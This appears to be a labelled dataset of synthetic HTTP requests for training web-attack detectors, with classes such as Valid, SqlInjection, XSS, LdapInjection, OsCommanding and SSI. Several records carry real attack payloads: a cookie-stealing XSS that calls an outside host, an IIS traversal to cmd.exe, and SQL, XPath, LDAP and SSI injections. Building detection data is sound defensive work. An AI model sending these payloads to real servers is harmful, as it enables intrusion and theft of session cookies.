Content-Length: 267
Content-Language: e
Content-Encoding: gzip
Content-Location: http://dpser.uk/qOl0oonn.tar.gz
Content-MD5: U0VvYTRFZmU2NGh0ckhMbg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 22 Oct 08 14:16:39 CET
Host: www.dduha17w.de:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 62.209.148.254
Cookie: oHsu1=4e/y/r/child::node()[position()=551]     or 'senT'  =  '
Cookie2: $Version="93"
Date: Sat, 05 Jun 04 19:21:16 CET
ETag: W/"Ze7pzXA90rEmkmiH"
Expect: 100-continue
From: 5ixneda@rqhrvad.be
If-Modified-Since: Thu, 29 Mar 07 07:35:11 GMT
If-Unmodified-Since: Tue, 04 Oct 05 22:23:20 UTC
If-Match: "r5TBTdC9Em.ih.T3Hmo."
If-None-Match: *
If-Range: "yJhAeWxHMp5moXR"
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: a6ocet tbqE20r=l91ubeei
Authorization: Digest qop=wkSts
Referer: /deno8u/rsuthz/notl6r2n.gz
TE: chunked,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.3 (Windows; U; Win 9x 2.6; yn-Ln; rv:1.6.4) Gecko/10280670
UA-OS: Solaris
Via: aapRpu/1.3 www.47ryctr.gif, 6.5 www.s6rdalt.htm
Transfer-Encoding: PqObb; nuTn=eouPrett
Upgrade: hiiEt/3.7
X-Serial-Number: 08336160636
----: ------------------------------

tih=354&dsAlthdnwhs=ar8&LnhddixfihvO8=778242443&rjnei8oaut=7074311&aEasrpugrSne=7611226760&ls=a2rnhP&oac81E=701089&tsotpawilsAgrc=lbcov1u&h4hxpot=geeunc 2ce$ec&ci6e=0Vuf-&abodyadmin3siKvarJ1x5=5eNjeaere&lpuetnbejE0a=2&qaPhOl5utn=dxJEIBj1T&rsnIworxsatc=tpasswddropii

End - Id: 35911
Start - Id: 8229
class: Valid
GET /k8scriptmeta1mjWu1d/Rani7tthp7atWioqsd/tdih0lbeqYb6itp/cifu/aUoiCEK/eipgtidjitjMdrNot/b8Ck3b_nN.png?mcrheseeemrnbi=nst&o1nocmr6Ilad4g=afDsKVlChnZ&IH-nv=nTt&logml6EHZlikeQQ=095&tthtstterii6x=jDfeoay&4oa9r1=4722&.fCi=95373&gTlocationtmp=husxu&OlnNhrhmmyaeii=u+an&erNtnmr=5185&icasrhPestsela=7&dw=%26Hk HTTP/1.0
Host: www.ihlh.de
Connection: keep-alive
Accept: audio/*, audio/*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: 5-naod9, 3hrhoEe-5anil;q=0.8, jb4P-lT;q=0.7, ughytash-emgqyrms;q=0.1
Cache-Control: wlNaF=nHsze
Client-ip: 30.130.64.241
Cookie: aZv-B14=53604;ANrnnanVee6bot=fCanaiaLeenen ;seocodoe3tieeMi=rVfBX39jYs;zdftaAlagiE=ehvfcvj1ys2
Cookie2: $Version="6"
Date: Fri, 02 Nov 07 11:06:32 CET
ETag: W/"TiP..1vkx14ddc8"
Expect: dortDe=dirus
From: wuDdgin@loei.com
If-Modified-Since: Fri, 04 Mar 05 07:37:54 CET
If-Unmodified-Since: Mon, 14 Dec 09 18:50:22 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Nov 06 18:16:57 UTC
Max-Forwards: 74
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Basic NnlyZG1uRDoxaG5vemg=
Authorization: ccee V9emtoce=lrpi
Range: -164292,-5
Referer: /atotm/ErItnmd/dnedae.wmn
TE: trailers
Trailer: Pragma
User-Agent: eeapvyrehk/8.7.3.0
UA-CPU: Sparc
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1314x8718
Via: a1d/1.9 www.anse.gif, 2.7 11.108.149.190, 3.4 139.186.59.224:5741
Transfer-Encoding: iey5; ysneu=nhty
Upgrade: ib6Ex/5.7, aZse/0.7
Warning: 670 www.cs6c6t9.jpeg:59 "lmks8eesslpsErlnroH" 
X-Forwarded-For: 176.93.53.162
X-Serial-Number: 9806136470509307613
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8229
Start - Id: 37129
class: LdapInjection
GET /s-tTxCxQC/anmRhHdthubnH/pttolieostaloog5/thru9tUtot/toqtrF/lDT_MF4FIVIZKTf/lie7umhsclcn/au/sy/lYuF-PtNtR2Oak/axbVvhE7wh9oJ/nyRBmbTv1P-E.tiff?nxh0sn=%29++%28+%7C%28enozA%3Daueet*%29 HTTP/1.1
Host: 169.192.211.176:419
Connection: close
Accept: image/*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: He60ra-oube, xos-ddl;q=0.2, fc-iaTosnou, oKeeve-shkn, asfi-qete;q=0.3
Cache-Control: no-transform
Client-ip: 55.97.57.216
Cookie: 0hnreid=aeeoav2ep0tliohBSc;ssIse6cheteaid=Aorwb77etsasth
Cookie2: $Version="74"
Date: Sat, 25 Mar 06 23:24:20 GMT
ETag: W/"TzveiS5IzxQFMU_"
Expect: seeuhtcr
From: ke6iat@otEmem.org
If-Modified-Since: Tue, 22 Jul 08 20:27:35 CET
If-Unmodified-Since: Sun, 22 Feb 09 18:31:05 GMT
If-Match: "s73n6l@MZB6r9fOBG"
If-None-Match: *
If-Range: "Ih2PkZJ0miHsL15hnx"
Max-Forwards: 03
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM d2FvU3JvaXRDZGNlSWhlbk9wRWVjdGJlb2hrcmVjZWQ=
Authorization: NTLM aFVpdmt0a2NpbkV0M2VldGVibHF6ZGlnbEI5NGRlbkluNGJvaWVl
Range: -972338,855782-
Referer: /oieeie/ialvgn/wmbg.fgf
TE: trailers,deflate;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/0.4 (X11; U; Linux i586 2.6; Ht-hi; rv:0.1.0) Gecko/88664153
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: 3.2 www.wra0.jpg, hoco/9.7 135.116.80.166
Transfer-Encoding: deflate
Upgrade: tRvc9/2.0
Warning: 290 81.121.41.20 "1erpeehEtorXv" 
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37129
Start - Id: 23371
class: Valid
GET /h98KQ_tSHNnPG1-/eIiigBdRaKUqFaE@@b/jzvz0ip1Cvp4U/bpemJHpIzhgC5OqkzfmR/GM-Tx/hUGJ/acwOhc/4N0eoy-6P5A2QM/rWvVQZY7S8Zws/AeTaOts4i8fhljtee/onhystasoh.jpg?efbucrs=75218&gOtewEAop7vrto=T&etgtgphiher=pr2copy%24&Oomni7uciuw1d=sn2&NSI3@YPKH7=nhshttp%2B%7EeRcgs&eiiqswr8q4siYfO=ez1bWfYAtMe&sg=52556&zd7se=431&bielHtsNXmdlrts=84&eTrzarwsEnjhn=%5D%27&QP8Hbgsound1Ryg4v=oWU&eCatfsaFle=noldld5l&phAeLnPs=Oiey%5Ci%3Eao2uo+aib HTTP/1.0
Host: 191.179.195.32:80
Connection: eOss
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, identity;q=0.6, gzip, identity;q=0.3
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 254.183.167.167
Cookie: feqin=rGNT9;mnept0zeoe=7815552;Bi_-R-AUQ0sw=iAoto7wyeEcnEuaa;.6Xu5OobjectjSsystems.=63037656
Cookie2: $Version="538"
Date: Mon, 07 Feb 05 16:03:35 CET
ETag: W/"qq6_q7l5V58IXvL"
Expect: rhdsost
From: tntx@8an8.be
If-Modified-Since: Fri, 23 Jan 09 24:03:31 GMT
If-Unmodified-Since: Fri, 18 Mar 05 18:57:29 CET
If-Match: *
If-None-Match: "6k91xuHBaLg8VHT4S"
If-Range: "b_sYldR9OGdxRNBKuqiz"
Max-Forwards: 74
MIME-Version: 0.2
Pragma: e='alronh'
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: NTLM OWhhc3hFdGdpMmhyY3JvbzcwbzhoZW50bmFsc2lsZnIyaW9Ic0hmdGFlZXkzdHJy
Range: -498369,5-,-5
Referer: /tazis.cgi
TE: trailers
Trailer: Trailer
User-Agent: gwn3f28d (g9yL5_EB7J; fYqgYu; bU1PQB)
UA-CPU: StrongARM
UA-Disp: 9336,5495,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 487x066
Via: HTTP/3.2 www.Ag9cgee.htm
Transfer-Encoding: deflate
Upgrade: onIt/4.0, 96i/3.9, ud3/7.4
Warning: 767 www.nutng.jpg "imrettlerf" "Thu, 18 Feb 10 04:49:03 GMT"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 996709990396001467
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23371
Start - Id: 7710
class: Valid
POST /nyO7tl_Wmf5lXXW/THP@fGA@R@/9or/6e.mdb? HTTP/1.0
Content-Length: 135
Content-Language: goatu,cIytintz
Content-Encoding: gzip
Content-Location: http://www.crhketl.it/awth/inperr/te3sha.gif
Content-MD5: ZTFoZWRzc2VldGY0eHR0eA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Aug 07 11:26:50 GMT
Last-Modified: Sun, 03 Feb 08 16:24:22 UTC
Host: 23.229.145.96:4074
Connection: keep-alive
Accept: application/rtf
Accept-Charset: windows-874;q=0.8
Accept-Encoding: deflate, deflate;q=0.0
Accept-Language: nomido-cqhaPer;q=0.9
Cache-Control: max-age=0262
Client-ip: 53.244.216.41
Cookie: CAQbgsound7tSDTg3=eeIkfaes9nieea8;osTng=lsrtwmope;oi=9;openmd2Uvar@iPlDG=gei](2rb;oncm1seE5vl=3269998;htattiir2AGhE=ecsCs
Cookie2: $Version="580"
Date: Sun, 20 Jan 08 15:08:45 UTC
ETag: W/"Tf-T-dYsVGH74pjg4"
Expect: 100-continue
From: hmytnwrh@n44u6.net
If-Modified-Since: Sun, 04 Dec 05 02:01:44 GMT
If-Unmodified-Since: Sun, 02 Jul 06 15:30:30 CET
If-Match: "LD7hHtPVD0jZ88e8"
If-None-Match: "yon0IUw8yEZCXS5CO"
If-Range: "DhdBmmSH2fFT-6nuBl"
Max-Forwards: 2309
MIME-Version: 7.7
Pragma: ebeeut='xhe9tS'
Proxy-Authorization: NTLM ZVNjaGhjZGlpM3VUUm95ZWUxcmVnQ2tpcG43OFpsZXJudGtyaW5u
Authorization: NTLM eGVyaWg3b2VhYWg5NmVlZWRjbnJuZTlzR3BzMHRvc2R3N3Q1bnhoZG5nbHNoZXQ=
Range: 379802-58050
Referer: /NusAee/rAoiqU/enlii8el/hubwF3Dk.aspx
TE: trailers,chunked,trailers
Trailer: Via
User-Agent: Tyaan (a5O86Eum6; 9SACryPi; tjEEeZ)
UA-CPU: Sparc
UA-Disp: 609,771,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 507x2822
Via: loEbce/9.4 131.119.244.154, 4.3 52.89.24.111:59272
Transfer-Encoding: identity
Upgrade: liyti/7.1, biteq/1.2
Warning: 480 196.122.77.17 "8mahoZAa56riutaIm" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 8041864595
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~

gtniy=m0g&ovo7g=esI&ltnhtvao4uh=171&AttteeiatFed=rh~bgsound0ihkr\sNa|de&3psedo=rroar9h2m&tt=e&Mu8Jy=aigmwwt0lts&hxdnnzusem=76snrs

End - Id: 7710
Start - Id: 12038
class: Valid
GET /eebetesaaag/es6ennnvaeo6/sMS2ho/rn6VAe7crehnagQcY/aaeh353of/9tTArornhaf/sQemRH.OZform/jCyhttpsokhtaccesQc2systemeIy/atcs/keoeasujronhrb/t@Im0tymt/xuQEcFNPHp89MhSpkk.5.mspx? HTTP/1.1
Host: 129.222.225.178
Connection: iOa1i
Accept: video/quicktime;q=0.1, image/*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: 3w-nre;q=0.5, rnfc-ewdmht;q=0.7
Cache-Control: min-fresh=78823
Client-ip: 149.5.101.39
Cookie: nee=19
Cookie2: $Version="585"
Date: Sun, 06 Jan 08 12:25:14 GMT
ETag: "4VdNvDxnQ_vOTnM_5thW"
Expect: iaed6wap=Sox6i;utuee
From: bteasrrn@to2anee.fr
If-Modified-Since: Mon, 22 Feb 10 18:35:52 GMT
If-Unmodified-Since: Wed, 26 Sep 07 14:42:41 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Nov 04 17:08:51 CET
Max-Forwards: 830
MIME-Version: 6.1
Pragma: aEr49=6ei5
Proxy-Authorization: Digest nc=117fd3f5
Authorization: hajt et08ea=oeev
Range: 421490-
Referer: http://www.hsas3n.gov/ohexee/ooide5lk/slehixEe.jpg
TE: gzip;q=0.4,trailers
Trailer: Via
User-Agent: Mozilla/5.1 (Machintosh; U; PPC 2.0; eh-ni; rv:7.8.7) Gecko/36402100
UA-CPU: MIPS
UA-Disp: 123,4822,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 165x736
Via: FTP/0.7 www.rsNt.shtml
Transfer-Encoding: identity
Upgrade: hrhef/3.6, dhe/2.9, s8nhre/8.0, dorop/7.3, o9g/4.9
Warning: 387 192.94.148.208 "eehfyveehnqh24sA" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 0508881327530
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12038
Start - Id: 17519
class: Valid
GET /enkpChactiyEc/8SvAWnetcatTarJpasswd/iPidY.PP2/e3alcetvooRchon/akwD.-XcLW/nJ.jpg?RnLccziAfaotHEf=%3C%2Faaax&taikNiZeFioo=4tArefoIelame0tOt&rwnseosIanTmEet=mienEsireesm2a&ioSae=oamkunion%7Eiuhle%2F3&8sado=exPUU6P&ohgnm=+5ri%3D&u-qDdwAc=829720&uYl92=ce&nddci27xfahgo=hHbYxr HTTP/1.0
Host: www.es0vfoEotn.fr
Connection: azei
Accept: text/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, deflate, gzip
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 171.109.4.169
Cookie: TmqclgdTnr=/Resac etAetVoe9;Gied6kcn6=exdl;Ie7o8n;ealll=tee8eg>&rgnt;pe9Vitnc=2546;form4uyJcTyg=dyOatnYlt5X;ihgaoY=yaaru
Cookie2: $Version="01"
Date: Wed, 19 Nov 08 02:54:43 GMT
ETag: W/"3-@NsXhqdePj1@D@Dq0A"
Expect: 100-continue
From: pltrgcr@hrswfw.com
If-Modified-Since: Wed, 09 Dec 09 16:46:57 CET
If-Unmodified-Since: Tue, 04 Nov 08 12:07:36 UTC
If-Match: "7e@Hk_MpaeNMM5ZdJi"
If-None-Match: "GEq8CUsxKXvR6@FB9"
If-Range: *
Max-Forwards: 42
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: Digest nonce
Range: 8940-,0923-,5121-
Referer: /nduI/eifM/s0weznt/ugn6co.dll
TE: trailers,chunked
Trailer: Date
User-Agent: eaiuSH
UA-CPU: StrongARM
UA-Disp: 3556,2062,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6595x691
Via: 6.4 89.235.129.66, 1.8 www.c6tLwi.shtml, 8.7 5.126.234.40
Transfer-Encoding: dei65i; lw0seo=doae
Upgrade: wys/9.8, dwn/4.4
Warning: 256 www.hcAgiw.jpg "izNdebthOurploq" 
X-Forwarded-For: 249.253.15.15
X-Serial-Number: 2759427
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17519
Start - Id: 27167
class: Valid
GET /wfc5HH/c5tysat3eeottoaAUHe/hlmIzslmJy2-4VQ/oRADQ/iFBjydO3fM@0GnL@/dNPNTE_1uEAmgApHkG0f/intcuD2essrh2Hlaasm/OAnjacoJd9Oahlans19h/ayWe.html?tsuprrha=64462372&nlRlht=913&ntooohcne7dhfi=fteilbfeezusE0%27&_1mrCvbscriptu=2308 HTTP/1.0
Host: 68.178.250.92:514
Connection: close
Accept: video/quicktime;q=0.3
Accept-Charset: cp-932;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=97
Client-ip: 81.132.85.194
Cookie: Ko.qOuApassthruZ=41979;kfhlneedb3raa=tettmriVbodr;ZwKgoiV=dsiuwsAdno5ce9mt;ty=xpci2
Cookie2: $Version="2"
Date: Tue, 04 Mar 08 09:12:28 CET
ETag: "f3dTSwKWN8d2GumF3R-"
Expect: 100-continue
From: rfaD@lnxcgefa16.uk
If-Modified-Since: Sun, 11 Apr 04 06:45:51 UTC
If-Unmodified-Since: Thu, 06 Sep 07 07:58:30 GMT
If-Match: "2Tv0BqVXvd0aAQpaB"
If-None-Match: "SrsI_q7mzmLvL@kmv"
If-Range: Fri, 02 Apr 10 07:47:03 UTC
Max-Forwards: 2
MIME-Version: 3.3
Pragma: e=t7j
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: NTLM ZTFlZ3Jhb3l5cG9pR25JdDlhU3VlZHROaXJobHI5cnVoZmFlaEVnb256dW5u
Range: 026-10,-71,7-952
Referer: http://cfahApt.ch/tsgiehEo/es3d2/oti26/aI6e.msf
TE: trailers
Trailer: Accept
User-Agent: Mozilla/4.0 (Machintosh; U; Mac OS X 7.4; yC-ud; rv:8.1.9) Gecko/14052375
UA-CPU: MIPS
UA-Disp: 137,543,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1267x0247
Via: 3.7 www.QentThs.css:78, Nsee/5.4 191.104.58.144, HTTP/4.9 190.23.192.178
Transfer-Encoding: identity
Upgrade: neae/3.6, fitz7t/2.1
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 13.58.9.225
X-Serial-Number: 13809536911
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27167
Start - Id: 34540
class: Valid
POST /n.-5E5nKQJla_oXS/oMa5YyZEl5zj9TUDn/o0h/Em/anutototaitaEN/-TsxQEC4acceptp90/c59EIv4/uHhrn0yKkL7/ranki9nn/nthmeuaeera3vct/eOAXZR.6n.91EZR.php3? HTTP/1.0
Content-Length: 188
Content-Language: aTs2s,lceac,stc
Content-Encoding: identity
Content-Location: http://MryCes2.uk/Pmea/isstile1/BysezN/emr5rhj.avi
Content-MD5: dGRldnRlaWFlczd1NmVydA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Feb 05 05:34:04 GMT
Last-Modified: Thu, 26 May 05 23:59:18 CET
Host: www.ottd1mwLr.com
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, compress;q=0.7, compress;q=0.3
Accept-Language: t-icedts3o;q=0.2, lai-rRo2tol;q=0.0, ensstmo-3, do8-oalitc, 1b-ada
Cache-Control: oH9c=o
Client-ip: 167.0.25.250
Cookie: sO4Tre=6l+i'winnt;lwevgn2d=itl84ofeoe9bNiihhU;uwO18jhtaccesV=3ten;sclv=a;f0etfdoew4Soo=&/
Cookie2: $Version="195"
Date: Sat, 16 Apr 05 17:58:33 GMT
ETag: "ztLiWzxg36KdLeVp"
Expect: Milethca=b2muo
From: aiiTbdt@stretps.it
If-Modified-Since: Thu, 04 Feb 10 20:58:28 UTC
If-Unmodified-Since: Thu, 06 May 04 09:28:15 UTC
If-Match: "x._oXgjjiP@Y0FeE"
If-None-Match: "cRYVsJC9Sg.@fnf06Nf"
If-Range: Sat, 14 Feb 09 03:35:50 UTC
Max-Forwards: 6
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM bGNobmljaGtpdFJ4a0tDY2hsbmxGaHI1dG15ZWVjbm9hdHNjbw==
Authorization: Digest cnonce="eaoj"
Range: 700959-,22-,44069-
Referer: /penw0.jpg
TE: chunked;q=0.9
Trailer: Via
User-Agent: Mozilla/9.4 (Machintosh; U; PPC 6.2; Ae-ua; rv:9.7.8) Gecko/99753687
UA-CPU: MIPS
UA-Disp: 245,2195,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 066x785
Via: 5.7 www.4oeerfTo.css, HTTP/0.7 160.36.158.163:88347
Transfer-Encoding: deflate
Upgrade: kRoot/8.0, ash/7.6, qah/9.5, stwee/0.8
Warning: 065 65.77.102.167 "nhro5a2" 
X-Forwarded-For: 38.219.193.159
X-Serial-Number: 52771929
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~

ownuiwson6bi=ltrmos=|etlcw)&ss=50&ye=s7dgoicnovO9aer0y&oi7otunrah=aLszto&tIesu8swsiA6q=nsobject&dtmfaNs=8x&-HAMhttps@9a.Q=ywietaiaoei&di=oZKc&ssbtfthlr0weo=eodaesg&detNmpnrStent=smee

End - Id: 34540
Start - Id: 1112
class: Valid
GET /ZznaqFjf@/soK3VCBv2DBTG/tshetRinsopea9pir/bFZJ.jpg?tor6tt1ih=7394&dniv8a=616&noNd=753759891&BXoTL_81sH=5158248 HTTP/1.0
Host: www.2aptS.org:80
Connection: close
Accept: application/rtf, application/*
Accept-Charset: iso-8859-7, iso-8859-5, iso-8859-1;q=0.3, gb2312, euc-tw;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=990
Client-ip: 179.209.57.142
Cookie: mrn=0
Cookie2: $Version="48"
Date: Sun, 07 Jun 09 11:09:13 GMT
ETag: "b5LmK1iJgh9xKKTJd4a"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Fri, 05 Sep 08 04:09:49 CET
If-Unmodified-Since: Fri, 10 Feb 06 19:41:18 CET
If-Match: *
If-None-Match: *
If-Range: "S6TVuWKqqAMv07SFvc"
Max-Forwards: 3716
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM c3RlY1JudGlvYmVpdGVhcWVkaUVkdHRobnJxZGVtcnRiaW5jaDJkTG90Mg==
Authorization: htdM 8ehr=mo0wp8s
Range: 634551-,48052-6687,-9
Referer: /ccLauiLn/bdoloeno/rlihdm/suqie.jpeg
TE: trailers,gzip;q=0.4,trailers
Trailer: Connection
User-Agent: bSeRM/2.1.9.2.5
UA-CPU: 68000
UA-Disp: 4228,5087,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8837x3320
Via: 3.4 www.97olve.shtml:5696, 6.0 www.mese.gif
Transfer-Encoding: identity
Upgrade: nwt/2.1, 9Anoe/4.1, tte/7.6, oIr/1.1, 0rasra/0.1
Warning: 737 144.157.19.107 "tuN5hTIzo9baaeA" 
X-Forwarded-For: 36.96.25.139
X-Serial-Number: 704934
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1112
Start - Id: 48114
class: XSS
GET /YBHPVWJinclude0G-u/nQGoqjh-nC.png?kLw_XAyxT.QE=xS80G_LBD&udks=%26%7B%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.restsi.com%2Fcgi-bin%2Fllra.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B HTTP/1.0
Host: www.ceaRczhath.com
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: cp-936, iso-8859-8;q=0.5
Accept-Encoding: identity, compress;q=0.6, identity
Accept-Language: *;q=0.3
Cache-Control: fsm2bni=eoeneogb
Client-ip: 228.184.243.149
Cookie: Eeoe=uTeenmy;lptlsvtzKetr=[>yil;hslnh=hd47giapotnajg
Cookie2: $Version="832"
Date: Mon, 22 Dec 08 09:54:08 UTC
ETag: W/"GF78l1dMS6kcBxcLqI"
Expect: ahe0tkh
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Wed, 22 Aug 07 22:22:52 GMT
If-Unmodified-Since: Thu, 27 Apr 06 20:59:13 UTC
If-Match: "xPb8iK-qdGXF1uL@"
If-None-Match: "ANRymYM0@C.YgZkJxoZ"
If-Range: "edcBr0NRKBaBU8o"
Max-Forwards: 8
MIME-Version: 3.4
Pragma: 4eenio=tdfkms
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: http://www.n6tsrah.uk/sea8ormu/Itc3oee/frMe/tsx0el.swf
TE: deflate;q=0.0,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.4 (Machintosh; U; PPC 4.9; ot-es; rv:2.2.6) Gecko/49474013
UA-CPU: Sparc
UA-Disp: 367,260,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6001x2247
Via: itc/9.4 www.tnaee3a.gif, ihxe/1.2 22.35.3.209:4, 0.4 186.28.142.209
Transfer-Encoding: yrsvso
Upgrade: 1yro/5.7, fny/6.4, xIet/5.5, Uqle/5.3
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 72.155.7.72
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48114
Start - Id: 36435
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 12.125.73.171
Connection: l3jeaAs
Accept: video/quicktime;q=0.2, audio/basic;q=0.2, text/*;q=0.9
Accept-Charset: *
Accept-Encoding: identity, compress
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 43.227.10.174
Cookie: nmEiiesisSahp=r30wFPa9
Cookie2: $Version="63"
Date: Thu, 30 Sep 04 21:30:30 GMT
ETag: W/"u4HtIBSrU_SJ2Q3p6Q"
Expect: ajatsei7=hn7Hs
From: AtjrnsE@aethffn.uk
If-Modified-Since: Fri, 23 Jan 04 01:41:08 UTC
If-Unmodified-Since: Mon, 16 Nov 09 23:26:40 CET
If-Match: "4dBcvQg5UBtZjQ2p"
If-None-Match: *
If-Range: Mon, 04 Apr 05 08:15:50 GMT
Max-Forwards: 7090
MIME-Version: 0.7
Pragma: c2fqred=Ddnj
Referer: /mwncun/tit7e/nstt/vtwfUf.msf
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/4.7 (Machintosh; U; PPC Mac OS X 0.3; l1-bl; rv:7.0.0) Gecko/03291721
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color16
UA-Pixels: 006x6469
Via: 4.5 130.9.42.96
Transfer-Encoding: mr4ri
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 113.116.65.59

null

End - Id: 36435
Start - Id: 42214
class: SqlInjection
GET /_x9/6u.png?xwCsock_stream=tanstelnetzggroup+bys%26ue2&t7ADmktlipuetoo=%27++%2B++%28+SELECT++TOP++1++leo+FROM++aigze8ci%29++++%2B++%27 HTTP/1.1
Host: 231.182.113.7
Connection: gfrn2jb1
Accept: */*
Accept-Charset: x-mac-turkish;q=0.1, windows-1258
Accept-Encoding: gzip;q=0.6, identity;q=0.4, identity, identity, compress;q=0.7
Accept-Language: erlIeat-snxt
Cache-Control: sik='iw'
Client-ip: 18.67.226.114
Cookie: WoCS=e) lwu-0iprw
Cookie2: $Version="62"
Date: Tue, 09 Jan 07 04:05:32 UTC
ETag: W/"Hj32b9gWZ7k@hB4iM"
Expect: Loobi=oDnd
From: 6bttom@2kOpyg.org
If-Modified-Since: Sat, 15 Dec 07 10:14:54 UTC
If-Unmodified-Since: Wed, 24 Aug 05 23:43:17 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Feb 05 21:31:27 UTC
Max-Forwards: 5867
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: ssh1 s2e1asI=bttabi
Range: 8473-303,-227666,770360-
Referer: http://www.hifuen.ch/grtnih/ooyh/6aimbm.conf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.6 (X11; U; Linux i386 6.0; fi-ix; rv:5.0.7) Gecko/12992539
UA-CPU: x86
UA-Disp: 327,4301,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 6.2 125.171.191.194
Transfer-Encoding: compress
Upgrade: he8e/9.1, uArqem/3.7, oettlh/8.9
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 32378960313
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42214
Start - Id: 35019
class: SSI
GET /estothv/db@lQl/P8gopt_tH2Uy8_dsA/SbwNpmusSiykhfmhl/vBR4pkwgK57U0EJh/boHr1e8tiaoutxtlndDd/lPsAJdFaGshMn2X/iRsrrAhe/G.C5EB/tqZjTm_kiYPccwZQCb.css?tHnsas=passthruiguab%3Diy%3Dl&ac1=aOLb&sid4oP8ottetm=5&8GPpositionEudiZ0A=2628709925&zhdijl=ofvusicoertemlbi&4sx3tTdrsw=2&Z5fGp3=5&srnt12rid=76457277&lzaAhCsH=%3C%21--+++%23odbc+connect%3D%22snt%2C1ivh%2Ceeprn%22++++statement%3D%22select+++++*+from+re%22--%3E&ohuteTdfxvn=evtmall%28%2BE HTTP/1.1
Host: 189.95.161.201
Connection: keep-alive
Accept: text/xml, application/*;q=0.4
